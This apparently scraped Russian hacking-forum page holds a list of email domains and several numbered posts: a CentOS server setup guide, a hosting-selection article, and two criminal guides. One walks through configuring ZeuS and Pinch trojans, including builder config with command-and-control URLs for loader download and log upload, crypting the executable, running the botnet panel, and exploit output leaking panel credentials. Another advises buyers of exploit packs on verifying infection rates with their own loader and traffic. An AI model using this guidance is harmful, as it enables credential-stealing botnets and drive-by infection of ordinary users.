@ pochta.ru @ pochtamt.ru @ poetic.com @ pookmail.com @ poop.com @ poormail.com @ pop3.ru @ popstar.com @ portsaid.cc @ post.com @ potsmokersnet.com @ presidency.com @ priest.com @ primetap.com @ programmer.net @ project420.com @ prolife.net @ publicist.com @ puertoricowow.com @ puppetweb.com @ qassem.cc @ quds.cc @ rabat.cc @ rafah.cc @ ramallah.cc @ rambler.ru @ rapstar.com @ rapworld.com @ rastamall.com @ ratedx.net @ ravermail.com @ rbcmail.ru @ realtyagent.com @ registerednurses.com @ relapsecult.com @ remixer.com @ repairman.com @ representative.com @ rescueteam.com @ rockeros.com @ romance106fm.com @ rome.com @ sa veourplanet.org @ safat.biz @ safat.info @ safat.us @ safat.ws @ saintly.com @ salalah.cc @ salmiya.biz @ samerica.com @ sanaa.cc @ sanfranmail.com @ scientist.com @ seductive.com @ seeb.cc @ sexriga.lv @ sfax.ws @ sharm.cc @ sinai.cc @ singalongcenter.com @ singapore.com @ siria.cc @ sketchyfriends.com @ slayerized.com @ smartstocks.com @ smtp.ru @ sociologist.com @ sok.lv @ soon.com @ soulja-beatz.org @ sousse.cc @ spam.lv @ specialoperations.com @ speedymail.net @ spells.com @ streetracing.com @ subspacemail.com @ sudanese.cc @ suez.cc @ sugarray.com @ superbikeclub.com @ superintendents.net @ supermail.ru @ surfguiden.com @ sweetwishes.com @ tabouk.cc @ tajikistan.cc @ tangiers.cc @ tanta.cc @ tattoodesign.com @ tayef.cc @ teamster.net @ techie.com @ technologist.com @ teenchatnow.com @ tetouan.cc @ the5thquarter.com @ theblackmarket.com @ timor.cc @ tombstone.ws @ topping.com.ua @ troamail.org @ tunisian.cc @ tunisian.cc @ tut.by @ tx.am @ u2tours.com @ ua.fm @ uaix.info @ umpire.com @ urdun.cc @ usa.com @ vipmail.ru @ vitalogy.org @ whatisthis.com @ whoever.com @ winning.com @ witty.com @ woman.in.ua @ wrestlezone.com @ writeme.com @ writeme.com @ xsecurity.org @ yahoo.com @ yanbo.cc @ yandex.ru @ yemeni.cc @ yemeni.cc @ yogaelements.com @ yours.com @ yunus.cc @ zabor.lv @ zagazig.cc @ zambia.cc @ zarqa.cc @ zerogravityclub.com @ MuseumFan.com @ ShowFans.com @ DocEmail.com @ HealthEmail.net @ TopNurses.net @ TeachFitness.com @ CarJunky.com @ FastHondas.com @ FastestCar.com @ V8Email.com @ AviationEmail.com @ BankersMail.com @ ChefMail.com @ InsuranceFan.com @ LegalFan.com @ PoliceOne.com @ SiliconEmail.com @ TechEmail.com @ TheGuilds.org @ HomeWorking.org @ OfficeEmail.net @ TNbusiness.com @ AEmail4U.com @ BlazeMail.com @ BuildTraffic.com @ TheDogHouseMail.com @ TheFreeSite.com @ GoBot.com @ HotSheet.com @ InternetFan.com @ Mail.vu @ MailBling.com @ MuchoMail.com @ NetZoola.com @ SpinFinder.com @ UltimateEmail.com @ WowMail.com @ ComputerMail.net @ CreateMail.com @ eLiteral.com @ HardwareFan.com @ SoftwareFan.com @ SoftwareAddict.com @ SQATester.com @ EcologyFund.com @ HappyHippie.com @ Nativeweb.org @ StyleFan.com @ BornAgain.com @ CatholicEmail.com @ Khalsa.com @ CollegeStudentMail.com @ HighSchoolEmail.com @ Math.com @ TeachingZone.net @ CoolYork.com @ DCEmail.com @ FloridaEmail.net @ IslandFan.com @ MauiEmail.com @ CBGB.com @ DarkSites.com @ Herzeleid.com @ K-earthmail.com (Radio) @ Knac.com (pure Rock) @ JenniferLopezFan.com @ Mugglenet.com @ Radio.fm @ RiverSongs.net @ TranceAddict.com @ Sluggy.net (Webcomics) @ SurvivorEmail.net @ VampireFreaks.com @ Aggressive.com (Skating) @ BaseballExpert.net @ BodyBuilders.com @ FootballAddict.net @ LoveToHike.com @ Surf.co.nz @ Triathlete.com @ VolleyballMail.com @ AnimalFan.net @ CookingFan.net @ HorseMail.com @ MeowMail.com @ ParentsOf2.com @ GenXemail.com @ OpenDiary.com @ RaveFan.com @ YouthFire.com @ FinanceFan.net @ InvestingFan.com @ StocksPlayers.com @ Bust.com @ LadyFire.com @ ModernWife.com @ WomensMail.net @ Cheatcc.com @ ChessFan.net @ MahJongPlayer.com @ AussieMail.com @ Bakililar.az (Azerbaidjan) @ CanadiansRule.com @ Email.co.yu (Yugoslavia) @ Jamaicans.com @ Humlog.com @ Postamatik.com (Istambul) @ ParisFan.net @ gmail.ru @ dinamomail.ru @ hrono.ru @ icqfoto.ru @ kievmail.ru @ lmail.ru @ mirabilis.ru @ radiomail.ru @ refer.ru @ spartakmail.ru @ tvmail.ru @ wmail.ru @ womenmail.ru @ elitemail.ru @ inet.ua @ fm.com.ua @ freemail.com.ua @ bigmir.net @ itua.info @ meta.ua @ 1Ru.net @ Barnaul.biz @ Barnaul.info @ Belgorod.tv @ Biysk.biz @ Chernogolovka.com @ Ivanovo.biz @ Kaluga.biz @ Kaluga.tv @ Kazan.biz @ Kemerovo.tv @ Kirov.info @ Kirov.tv @ Kolyma.org @ Kostroma.biz @ Kostroma.tv @ Kursk.biz @ Lipetsk.biz @ Lipetsk.info @ Lipetsk.tv @ Magadan.info @ Magadan.tv @ Maradan.biz @ Mari-el.biz @ Murmansk.biz @ Murmansk.tv @ Norilsk.biz @ Norilsk.info @ Norilsk.tv @ Nsk.biz @ Obninsk.biz @ Obninsk.info @ Obninsk.net @ Obninsk.tv @ Obrazovanie.com @ Obrazovanie.net @ Obrazovanie.org @ Omsk.biz @ Orel.tv @ Orenburg.tv @ Penza.biz @ Penza.info @ Penza.tv @ Pskov.biz @ Pskov.tv @ Rostov.tv @ Runet.biz @ Samara.biz @ Saratov.tv @ Smolensk.biz @ Smolensk.info @ Smolensk.tv @ Stavropol.biz @ Stavropol.tv @ Surgut.biz @ Surgut.tv @ Svetlogorsk.biz @ Tambov.tv @ Tomsk.biz @ Tomsk.info @ Tomsk.tv @ Tula.biz @ Tula.info @ Tumen.biz @ Tver.biz @ Tver.info @ Tver.tv @ Ufa.biz @ Upakovka.com @ Upakovka.org @ Volga.tv @ Yamal.biz @ Yamal.info @ HotPOP.com @ PunkAss.com @ SexMagnet.com @ BonBon.net @ ToughGuy.net @ Phreaker.net @ GameBox.net
  11. ..putty ! Я быдло админ ! Статья для новичков и не только Как использовать VDS на CentOS Всякие тру админы так и норовят втюхать вам Debian а того и глядишь FreeBSD. Вы этим несознательным элементам в ответ показывайте дулю и в УЛЬТИМАТИВНОЙ ФОРМЕ требуйте от них чтоб они ставили вам именно CentOS. 32 или 64 не важно. На сегодняшний день это наиболее православный дистрибютив linux для серверов. Качаем Putty - http://the.earth.li/~sgtatham/putty/.../x86/putty.exe логинмся через него. Как залогинилсь сразу пишем yum install httpd yum install *php* yum update. Потом yum install mc. mc – оконный менджер удобный. Бывает что в mc некорректно отображаются символы - решается установкой UTF-8 кодировки в разделе Window - Translation ( при запуске Putty ) Устанавливаем панель для удобства – я предпочитаю Webmin, из беслпатных есть еще Kloxo. От root войти в систему и пишем попорядку cd /usr/src wget http://prdownloads.sourceforge.net/w...0-1.noarch.rpm дождаться завршения скачки Ввести - rpm -U webmin-1.500-1.noarch.rpm", дождаться сообщения Webmin install complete. Запустить браузер, в адресной строке ввести http://вашь_айпи_адрес:10000 а потом логин (root) пасс. Прикрутка своих доменов yum install bind yum install bind-chroot Ищем как руками настривать bind в гугле либо же в wembine жмем -> Servers-> BIND DNS Server и там все интуитивно понятно. Через вкладки Servers->Apache Webserver добавляем свои домены. Если нету своих NS делаем через какой небудь free сервис - http://primaryns.kiev.ua http://pdd.yandex.ru http://google.com После всего этого. или /etc/init.d/named restart /etc/init.d/httpd restart или shutdown – r now Установка MySQL yum -y install mysql-server chkconfig mysqld on service mysqld start /usr/bin/mysqladmin -u root password 'new-password' mysqladmin -u root password 'new-password' mysql –p дальше гуглим по настройку /etc/my.cnf phpMyAdmin yum install phpmyadmin клнфиг тут - /etc/httpd/conf.d/phpmyadmin.conf Смею заметить что в некоторых кентосах он не входит в стандартный репозитарий и придется гуглить. Если чего из скриптов не работает гуглите про настройку /etc/php.ini Утром рано встану с раскумарки. Предо мной стоит один вопрос Где достать побольше **** и засеять *** там где он не рос Вы же понимаете что абзуоустойчивый сервер/VDS – это утопия немножечко. Поэтому что? Правильно – нада делать бэкапы ваших данных каждый день независимо от того что вам начесал хостер про аптайм и знакомого админа из ДЦ с которым они купили драп в туалете офиса. Sypex – ведущие собаководы рекомендуют, url - sypex.net. MySQLDumper - mysqldumper.net phpMyBackupPro - phpmybackuppro.net SQLyog Enterprise - webyog.com Navicat – православненько.. православненько.. - navicat.com BigDump: Staggered MySQL Dump Importer - http://ozerov.de/bigdump.php При помощи PuTTy (SSH) можно сделать тунель на свою машину и напрямую себе лить дамп Алсо можно через команду mysql: mysql -u <username> -p<password> mysql_database < mysql_database_dump.sql А сами файлы с вашими сайтами или троем архивируем так – tar -c tut_imia_papki/ | bzip2 > imia_novogo_faila_arhiva.tar.bz2 Купите на infobox.ru , firstvds.ru или inferno.name самый дешевый VDS за 5$ и с него делайте бэкапы и храните их там, очень удобно. Ускорение работы PHP Занятная полемика и демагогия по этому поводу: http://ufacode.ru/blog/programming/43.html http://it.vcore.ru/?p=470 чмоке.. чмоке.. проказники! (c.) infraud 28.01.2011
  12. Каждый день мы сталкиваемся с задачами, решение которых невозможно без использования троянов. Какой продукт выбрать? Стоит ли писать свой собственный трой или обратить внимание на модификации уже существующих? Какому билду доверить свои силы, время и затраченные средства? Запасись терпением, я подробно расскажу о наиболее известных троях, их конфигурациях и практическом применении. Речь пойдет, прежде всего, о таких троянах, как Pinch и ZeuS. Во-первых, оба продукта широко известны, а во-вторых, найти рабочую версию в паблике/полупривате не составит большого труда. Следовательно, можно опробовать полученные навыки на практике (естественно, на тренировочной машине, под VmWare, - Прим. Forb). Хочу тебя предостеречь: в Сети валяется куча протрояненных билдов, так что будь осторожен и не сливай софт из сомнительных источников. Но – ближе к делу! Сначала давай подробнее познакомимся с ZeuS'ом, а затем кратко сравним его с Pinch'ем. Zeus VS Pinch ZeuS состоит из двух основных частей: 1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер; 2. билдер - Win32-конфигуратор бота. О панели управления мы поговорим позже, так же, как и о конфигурировании самого троя. Сейчас нас интересует перечень основных возможностей продукта: * Отсутствие собственного процесса; как следствие, троянец невидим в списке процессов * Обход большинства файрволов (в зависимости от версии) * Использование временных файлов с произвольным размером * Работает в ограниченных учетных записях Винды (кроме Гостя) * Зашифрованное тело бота * Блокирует Windows Firewall, что обеспечивает беспрепятственное получение входящих сообщений * Все настройки/логи/команды бот хранит/принимает/передает по HTTPS-протоколу в зашифрованном виде * Наличие отдельного файла конфигурации позволяет подстраховать себя от потери ботнета в случаи недоступности основного сервера * Наличие резервных файлов конфигурации, используемых при отсутствии основного файла конфигурации * Возможность работать с любыми браузерами/программами, работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.) * Перехват POST-данных и перехват нажатых клавиш, включая данные из буфера обмена * Прозрачный URL-редирект на фейк-сайты c заданием простейших условий редиректа (GET/POST-запросы, и т.д.) * Работа с веб-инжектами, которые позволяют подменять не только хтмл-страницы, но и любой другой тип данных. Подмена задается при помощи указания масок подмены * Получение содержимого нужной страницы с исключением хтмл-тегов * Настраиваемый TAN-граббер для любых стран * Получение скриншота в области экрана, где была нажата левая кнопка мыши, после захода на нужный URL * Получение любых импортируемых сертификатов и их сохранение на сервере * Перехват логинов/паролей по протоколам POP3 и FTP в независимости от порта, и запись в лог только при удачной авторизации * Поиск на логических дисках файлов по маске и/или загрузка конкретного файла * Получение скриншота с компьютера жертвы в реальном времени (компьютер должен находиться вне NAT) Как видишь, троян обладает феноменальными способностями . Теперь посмотрим на Pinch. Pinch состоит из трех частей: 1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер; 2. билдер - Win32-конфигуратор трояна; 3. парсер логов - утила для расшифровки и парсинга логов троя. Среди основных возможностей продукта – перехват логинов/паролей по протоколам POP3/FTP, а так же граббинг сохраненных данных из IE. Описывать функциональную часть пинча я не буду, это уже сделали за меня. Скажу лишь, что оба трояна отличаются целью применения. ZeuS предназначен, прежде всего, для построения долгосрочных ботнетов. Тебе обязательно потребуется абузоустойчивый сервер для управления ботнетом и хранения логов. Pinch же, как правило, используют для нанесения «точечных ударов» (протроянивание конкретного человека с целью получения конкретной информации). В этом случае гораздо удобнее и безопаснее заливать админку на ломаный шелл, с последующим удалением оной. Настройка и конфигурация троев С Pinch'ем все просто. 1. Устанавливаем логин/пароль в файле filelist.php: $login='xakep'; $password='blabla'; 2. В файле admin.php устанавливаем режим ведения логов: $mode = 2; //Сохраняем на сервере 3. Заливаем файлы admin.php, filelist.php и каталог /reps на удаленный сервер. 4. Устанавливаем права 777 на каталог /reps. 5. По желанию прописываем и добавляем .htaccess (в целях безопасности). 6. Запускаем билдер, указываем хост и полный путь до admin.php относительно веб-каталога. Например: хост - 127.0.0.1 путь - /img/admin.php 7. Получаем готовый exe'шник, который криптуем по своему усмотрению. После того, как трой разослан, необходимо пристально следить за админкой – в скором времени там появятся логи, которые ты сможешь скачать и просмотреть при помощи Parser'а. А вот с ZeUS'ом все несколько сложнее. 1. Заливаем панельку на сервер, после чего устанавливаем ее: http://127.0.0.1/web/.install/index.php 2. П ходу инсталляции тебе необходимо указать следующие данные: * Root login: логин/пасс для админки ботнета; * MySQL server: данные для MySQL (пользователь уже должен существовать, но если указанная БД не существует, то она будет создана автоматически); * MySQL tables: названия таблиц в БД (следует изменить в качестве маскировки); * Local paths: локальные пути на сервере относительно директории установки. 3. Выбираем способ хранения логов (БД или в файлах) и указываем тайм-аут для ботов. 4. Ставим права 777 на каталог /system и завершаем установку. 5. После создания вложенного каталога /.files, необходимо запретить выполнение скриптов из этого каталога с помощью .htaccess следующего содержания: RemoveType php php_flag engine 0 php_flag engine 0 По Сети давно гуляет сплойт, с помощью которого можно без труда залить шелл на твой сервер и завладеть ботнетом, если ты отнесешься невнимательно к этой превентивной мере безопасности. 6. Запускаем билдер (по дефолту – «/local/cp.exe»). 7. Указываем файл конфигурации и жмем «Edit config», после чего конфигурируем будущего бота. Следует обратить внимание на такие пункты, как: entry "StaticConfig" ;botnet "botnet1"; здесь указываем имя ботнета, в нашем случае - botnet1 timer_config 60 1 timer_logs 1 1 timer_stats 20 1 url_config "http://my_server/web/cfg.bin"; здесь указываем местонахождение основного конфига, в нашем случае - http://my_server/web/cfg.bin url_compip "http://whatismyip.com/" 256; сайт, на котором можно проверить свой IP, нужен для определения NAT ;blacklist_languages 1049 end entry "DynamicConfig" url_loader "http://my_server/web/ldr.exe"; указываем адрес, по которому можно скачать апдейт бота url_server "http://my_server/web/s.php"; наш сервер, на который будут отправляться логи и файлы с ботов file_webinjects "webinjects.txt"; файл со списком веб-инжектов entry "AdvancedConfigs" "http://reserve_server1/zeus/cfg.bin"; в этом разделе указываем адреса, с которых можно скачать резервный конфиг end 8. Билдим бота и криптуем его по собственному усмотрению. Теперь немного о панели управления aka админка. В отличие от примитивной пинчевой панельки, мощная админка зеуса обладает такими функциями, как: * Многопользовательский режим; каждому пользователю можно задать определенные права доступа * Статистика установок (инсталлов, заражений) * Статистика ботов находящихся онлайн * Разделение ботнета на саб-ботнеты * Обзор онлайновых ботов (в том числе и по фильтру) * Просмотр скриншота в реальном времени * Просмотр и проверка Sock4 * Время нахождения бота в онлайне * Скорость соединения (только для ботов вне NAT) * Хранение логов в базе данных (дает следующие преимущества: поиск логов по фильтру содержимого; поиск логов по шаблонам с выделением нужных POST-данных) * Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера * Отдача команд ботам (в том числе и по фильтру) * Возможность собственноручного модифицирования админки Как видишь, опций более чем достаточно. Но в каждой бочке меда есть своя ложка дегтя. В случае с ZeuS'ом – это напрочь бажная и дырявая админка, в которой неоднократно находили sql-инъекции. Кроме того, я уже говорил об обязательном запрете на выполнение скриптов в каталоге /.files. Соответствующий сплойт ты без труда найдешь на просторах Сети. Использовать его довольно просто, достаточно лишь передать скрипту необходимые параметры: HOST: 127.0.0.1 FOLDER: web/ После запуска сплойт выдаст нам следующие данные: array(8) { [0]=> string(1) "1" ["id"]=> string(1) "1" [1]=> string(4) "root" ["login"]=> string(4) "root" [2]=> string(6) "t00r" ["pass"]=> string(6) "t00r" [3]=> string(10) "8194967292" ["priv"]=> string(10) "8194967292" } array(8) { [0]=> string(1) "2" ["id"]=> string(1) "2" [1]=> string(9) "admin" ["login"]=> string(9) "admin" [2]=> string(6) "12345098" ["pass"]=> string(6) "12345098" [3]=> string(7) "3097136" ["priv"]=> string(7) "3097136" } array(8) { [0]=> string(1) "4" ["id"]=> string(1) "4" [1]=> string(7) "bob" ["login"]=> string(7) "bob" [2]=> string(6) "bobyboy" ["pass"]=> string(6) "bobyboy" [3]=> string(6) "468872" ["priv"]=> string(6) "468872" } MYSQLHOST: localhost MYSQLUSER:zeus MYSQLPASS:grab_pass Отсюда получаем: 1. Аккаунты к админке: root - логин toor - пароль admin - логин 12345098 - пароль bob - логин bobyboy - пароль 2. Аккаунт к СУБД: логин: zeus пароль: grab_pass Сам понимаешь, получить доступ к твоему ботнету не составит особого труда. В любом случае, выбирать тебе, а я лишь описал два наиболее известных и распространенных трояна, существование которых ни для кого не является секретом . Danger Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут! Info * При установке админки в ZeuS не забывай об обязательном запрете на выполнение скриптов в каталоге /.files, иначе ботнета не видать, как своих ушей. * Стандартная админка ZeuS'а имеет несколько вкусных sql-инъекций. Покопавшись в Сети либо в самой админке можно без труда найти их. * При выборе трояна руководствуйся поставленной задачей. ©Netterberg
  13. Прежде чем остановиться на конкретном варианте при выборе хостера, необходимо внимательно изучить предложения. Есть такая шутка – «надо обратиться к вселенскому разуму», т.е. поисковику. Вбейте запрос «Услуги хостинга» и в появившихся вариантах уделяйте особенное внимание таким пунктам, как «дисковое пространство», «трафик» и «скорость передачи данных». Конечно, возможность иметь несколько баз данных, почту, поддомены и т.п. – это тоже существенные пункты. С ними все достаточно очевидно, а вот с указанными тремя пунктами нужно быть действительно внимательными. Выбирая хостинг, учтите, что вышеуказанные 3 параметра напрямую влияют на стоимость услуг хостинга. Поэтому многие начинающие осваивать Интернет предприниматели «соблазняются» на дешевые варианты. Я не говорю, что это плохо. Все опять-таки зависит от Вашего настроя. Вы сами должны прикинуть, для чего именно создаете сайт. Разложив все «за» и «против», Вы легко определите Ваши потребности. Дисковое пространство Дисковое пространство – это место под Ваш сайт, т.е. сколько хостер выделяет места на жестком диске своего сервера под Ваш сайт. Если Вы планируете сделать одну подписную страничку, сайт-визитку или небольшой сайтик с десятью стандартными страничками, то Вам могут подойти и самые дешевые варианты хостинга, касательно дискового пространства, конечно. Я не встречал этого параметра меньше, чем 0,650 Gb. Вообще, как правило, значения варьируются от 1,5 Gb до 10 Gb. А иногда хостинг может быть и безлимитным. Некоторые хостеры заманивают людей низкими ценами, предлагая, к примеру, тарифный план «Юниор», «Минимальный», «Little» и т.п. Оплата за такой хостинг может не превышать 130 рублей в месяц, но у Вас будет 0,8 Gb-1,5 Gb дискового пространства. Как правило, хостеры округляют, конечно, значения до целых величин в Gb. Бывают тарифы даже дешевле, но там настолько ограничены возможности, что мне лично тяжело сказать, потянут ли такие предложения хотя бы самые элементарные сайты... Если по мере продвижения своего сайта Вы будете размещать все больше и больше контента в виде статей, видео, аудио, флэша и т.п., то однажды достигнете лимита. И Вам ненавязчиво предложат перейти на более дорогой тарифный план. Лично я считаю, что в этом нет ничего плохого. Просто некоторые люди не готовы к такому и чувствуют себя обманутыми. Я же Вас просто предостерегаю. Лично я оптимист и считаю, что если Вы полгода пользовались услугами хостинга дешевле, то Вы сэкономили, правильно? Также важно понимать, что, даже перейдя на более дорогой тарифный план где-то в 250-350 рублей, еще через полгода Вы можете попасть в следующий лимит, например, 3 Gb на тарифных планах с типичными названиями «Мастер», «Профессионал» или «Оптимальный». Вы снова перейдете на уровень выше, если такой вообще есть (!!), который выльется уже в 450-600 рублей. Не все хостеры предлагают больше 10 Gb дискового пространства, дальше они уже предлагают «аренду» сервера на определенных условиях, но это понадобиться Вам, скорей всего, не скоро, а пока ограничимся и этим. «Зачем платить больше, если не видно разницы». А решать, как я обычно говорю, только Вам... Трафик Трафик – объем данных, который проходит через сервер Вашего хостера за определенный период времени, а если попроще, то это прямое отражение посещаемости Вашего сайта. Соответственно различают 2 вида трафика: • Исходящий трафик – все, что передается с сервера Вашего хостера. Посетитель Вашего сайта создает исходящий трафик с сервера Вашего хостера в виде получаемых им веб-страниц, скачиваемых или загружаемых файлов видео, аудио и т.п. • Входящий трафик – все, что попадает на сервер Вашего хостера. Посетитель Вашего сайта порождает потоки информации и от себя, согласны? Например, в виде комментариев, сообщений по рекомендациям или в Вашу службу поддержки. Если трафик в тарифном плане хостера явно лимитирован, то это может обернуться для Вас некоторыми затруднениями. В принципе, сначала, пока посещаемость Вашего сайта будет небольшой, Вы и помнить про такой параметр хостинга не будете. Но в случае если Ваш ресурс будет быстро развиваться и становиться популярным, то хостер Вам может и напомнить про это, выставив счет за лишние Gb трафика. Не факт, что «пережог» трафика выльется в большие деньги. Хуже, если у посетителей возникнут ошибки. Такая, например «The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later», которая говорит о том, что лимит уже достигнут! И есть риск, что Вы не успеете перейти на уровень выше по тарифной сетке. А вот «try again later» может и не получиться, поскольку искушенный посетитель может навсегда уйти с Вашего сайта. Переход на безлимитный трафик в случае необходимости может случиться «немобильно». Дело в том, что не все предоставляют услуги безлимитного трафика. Хостеры могут называть безлимитным трафиком объем передачи данных в 10 Gb. Поэтому будьте особенно внимательны в этом пункте. В таком случае, вероятнее всего, Вам придется менять хостера, что увеличивает вероятность нарваться на неприятность с ошибкой, пример которой я приводил выше. В случае если трафик лимитирован, то как же определить или спрогнозировать его, чтобы не попасть впросак? Не волнуйтесь, трафик можно измерить, и подобную информацию можно получить бесплатно. Ее предоставляют всевозможные специальные сервисы статистики посещаемости. Насколько мне известно, наиболее полную бесплатную статистику предоставляет сервис liveinternet.ru Этот сервис предоставит Вам: • число посетителей за день, неделю или месяц; • число посетителей online; • сайты, с которых зашли Ваши потенциальные клиенты; • поисковые запросы, по которым Вас нашли; • длительность сессии посетителей; • и т.д. и т.п. С помощью такого инструмента Вы сможете не только увидеть и спрогнозировать динамику роста трафика, но и провести дополнительный анализ в целях раскрутки сайта. В сети часто встречаются хостеры, предлагающие неограниченный бесплатный трафик при соблюдении пропорции 1 к 4 (входящий к исходящему). Получается, что если Ваш сайт посещаем и пользователи много скачивают и мало нагружают сервер хостера входящим трафиком, то у Вас все должно быть хорошо. Скорость передачи данных Что касается «скорости передачи данных», то этот пункт тоже стоит отметить отдельно. Итак, Скорость передачи данных – это скорость загрузки посетителями страниц Вашего сайта с сервера хостера. Вы, возможно, сталкивались с тем, что некоторые страницы сайтов или весь сайт по определению долго загружается, поэтому я не буду разглагольствовать по поводу того, как это «напрягает». На это бывает три причины. Первая от Вас зависеть не может – это скорость доступа в Интернет самого пользователя. Вы должны понимать, что если планируете свою деятельность в каком-то конкретном регионе, то Вы должны учесть среднюю скорость доступа людей в Интернет, выбирая хостинг. Города федерального назначения Москва и Санкт-Петербург значительно выделяются по этим скоростям на фоне остальных городов России, к примеру. Вторая причина – это «вес» самой страницы. Любой пользователь замечал, что страницы с видео, большим количеством картинок и анимаций загружаются дольше остальных. «Вес» страницы уже зависит от Вас лично, верно? И, наконец, третья – низкая скорость передачи данных с сервера хостера. Итак, все три причины ведут к «долгой» загрузке страниц Вашего сайта. Первую и последнюю причину можно устранить, выбрав тариф хостера с высокой скоростью, а вторую с помощью оптимизации сайта. Я имею в виду, что в таком случае лучше разбить страницу на две – к примеру, убрать ненужные баннеры, уменьшить «вес» и количество картинок и т.д. и т.п. Таким образом, в существующем количестве альтернатив Вы легко сможете сузить свой поиск хостера, если определите требования с дисковому пространству. Другие 2 параметра дадут Вам возможность заранее избежать возможных проблем уже на момент выбора хостинга.
  14. 1-)Это очень очень важно если в топике указано что пробив 20% но не сказано что такой пробив только на ие траффе это уже наебка !! То есть если пробив чисто на ие траффе 20% то на обычном траффе это около 15% . Автор связки обязан указать два пробива чтобы люди потом не предъявляли претензий.люди должны знать что покупают и знать пробив на общем траффе и чисто на ие 2-) очень важный момент на снг траффе пробив можно получить и 30% щяс а если пустить уса трафф то всего 5-7% будет тестировать нужно связку на микс траффе европа + уса или отдельно уса трафф а потом микс европы и посмотреть на пробив на таком и таком траффе 3-) не в коем случае не лить траффик который предложит продавец В связке продавец очень легко может подделать чтобы русский траф определялся как финский например Траффик должен быть ифреймы с сайтов (ведь в 99% случаях лучших пробив объявляют на ифрейм траффе) и траффик должен идти только от тебя + ты должен считать сколько уников от тебя траффа ушло и смотреть в его стате сколько пришло если продавец предлагает обнулить стату или делает это без спросу знает продавец уже пытается тебя наебать и что-то мутит для поднятия пробива ты обязательно должен вести у себя лог сколько ему траффа отправлено каких стран и какие ип 4-)Стата куда будет стучать лоадер должна быть на твоем сервере !!! не в коем случае не на сервере продавца !!!! далее если ты видишь что пустил 500 уников траффа а в стате пишет что 700 пришло то продавец тебя наебывает и льет еще снг трафф чтобы сделать больше пробив !! Если ты в стате по инсталам видишь что присутствуют страны которых ты не лил или ип которые ты не отсылал на эксп - продавец тебя наебывает и что-то мутит с пробивом 5-)очень важный момент пробив считается только по лоадеру никакие методы сниффа не катят это все чуш и наебалово если продавец предложит тебе сделать стату по загрузкам лоадера (метод сниффа) Но не по отстукам знай что это полный наеб 100% наеб потому что в таком случае эксп стучит на скрипт типа download.php?file=exe который записывает обращение и выдает лоадер на смачивание тут прикол в том что нет гарантий что лоадер вообще записался на комп или запустился Это просто обращение. Вариантов много разных например лоадер записался на тачку но выполнить его эксп не смог потому что палиться функция запуска файла нет прав на запись у текущего юзеря . В экспе палиться функция сохранения или что-то ее блокирует В общем вариантов куча .то есть обращение экспа на скрипт типа download.php?file=exe не дает гарантий попадания экспа на тачку и запуска скорее это уязвимые тачки но многие из них пробить не удасться скажем большинство поэтому пробив по сниффу это наебка 6-)Если пробив маленький и продавец начинает говорить что у тебя куевый трафф и давай любой другой нальем не ведись - он пытается тебя наебать и как-то завысить пробив 7=)очень важный момент это главное наебалово в связках Связка считает пробив только от ие траффа а не от самого траффа то есть если ты налил 1000 уников и из них 800 ие юзеры а 200 другие браузеры и у тебя 80 инсталов и связка показывает 10% то на общем траффе пробив 8% При покупке связки внимательно смотрите от чего считаться пробив бывает что связка записывает заходы с разных браузеров но пробив считаться от ие только !! Хочу обратить ваше внимание господа когда в 2х разных связках используются одинаковые экспы а в 1ной свяке пробив 10% а в другой 20% то что-то здесь не то Главное правило помните чудес не бывает !! При покупке связки всегда обязательно все тестируйте на своем лоадере и своем траффе причем лоадер должен стучать только на ваш сервер не в коем случае не на сервер продавца ! Всегда считайте пробив от общего траффа не важно пусть даже связка и под ие надеюсь инфа будет кому то полезна © Zaza666
×
×
  • Создать...